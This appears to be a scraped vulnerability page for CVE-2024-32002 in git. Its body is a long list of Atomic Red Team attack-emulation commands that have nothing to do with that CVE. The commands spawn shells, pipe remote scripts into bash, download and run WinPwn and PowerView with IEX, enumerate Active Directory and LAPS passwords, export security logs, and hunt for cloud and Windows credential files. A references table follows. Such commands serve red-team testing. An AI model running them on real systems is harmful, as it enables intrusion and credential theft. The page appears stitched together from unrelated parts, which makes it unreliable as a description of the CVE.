echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
ldapdomaindump -u #{username} -p #{password} #{target_ip} -o /tmp/T1087
ldapsearch -H ldap://#{domain}.#{top_level_domain}:389 -x -D #{user} -w #{password} -b "CN=Users,DC=#{domain},DC=#{top_level_domain}" -s sub -a always -z 1000 dn
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc admincountdmp #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc exchaddresses #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -f (objectcategory=person) #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -default -s base lockoutduration lockoutthreshold lockoutobservationwindow maxpwdage minpwdage minpwdlength pwdhistorylength pwdproperties
Invoke-Expression "#{adrecon_path}"
([adsisearcher]"objectcategory=user").FindAll(); ([adsisearcher]"objectcategory=user").FindOne()
Get-ADObject -LDAPFilter '(UserAccountControl:1.2.840.113556.1.4.803:=#{uac_prop})' -Server #{domain}
net user administrator /domain
(([adsisearcher]'(objectcategory=organizationalunit)').FindAll()).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] OU Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}
(([adsisearcher]'').SearchRooT).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] Domain Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}
net user /domain
net group /domain
net user /domain
get-localgroupmember -group Users
get-aduser -filter *
query user /SERVER:#{computer_name}
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainUser -verbose
cd "PathToAtomicsFolder\..\ExternalPayloads"
.\kerbrute.exe userenum -d #{Domain} --dc #{DomainController} "PathToAtomicsFolder\..\ExternalPayloads\username.txt"
Get-ADComputer #{hostname} -Properties *
Get-adcomputer -SearchScope subtree -filter "name -like '*'" -Properties *
Get-ADComputer #{hostname} -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
& "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -h #{domain} -s subtree -f "objectclass=computer" *
& "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -h #{domain} -s subtree -f "objectclass=computer" ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
$target = $env:LOGONSERVER
$target = $target.Trim("\\")
$IpAddress = [System.Net.Dns]::GetHostAddresses($target) | select IPAddressToString -ExpandProperty IPAddressToString
wmic.exe /node:$IpAddress process call create 'wevtutil epl Security C:\\ntlmusers.evtx /q:\"Event[System[(EventID=4776)]]"'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
generaldomaininfo -noninteractive -consoleoutput
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (9)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-32002 |
| github.com |
GitHub CVE
x_refsource_CONFIRM
|
https://github.com/git/git/security/advisories/GHSA-8h77-4q3w-gfgv |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/git/git/commit/97065761333fd62db1912d81b489db938d8c991d |
| git-scm.com |
GitHub CVE
x_refsource_MISC
|
https://git-scm.com/docs/git-clone#Documentation/git-clone.txt---recurse-submodulesltpathspecgt |
| git-scm.com |
GitHub CVE
x_refsource_MISC
|
https://git-scm.com/docs/git-config#Documentation/git-config.txt-coresymlinks |
| lists.fedoraproject.org |
GitHub CVE
|
https://lists.fedoraproject.org/archives/list/[email protected]/message/S4CK4IYTXEOBZTEM5K3T6LWOIZ3S44AR/ |
| openwall.com |
GitHub CVE
|
http://www.openwall.com/lists/oss-security/2024/05/14/2 |
| lists.debian.org |
GitHub CVE
|
https://lists.debian.org/debian-lts-announce/2024/06/msg00018.html |
| lists.debian.org |
NVD API
|
https://lists.debian.org/debian-lts-announce/2024/09/msg00009.html |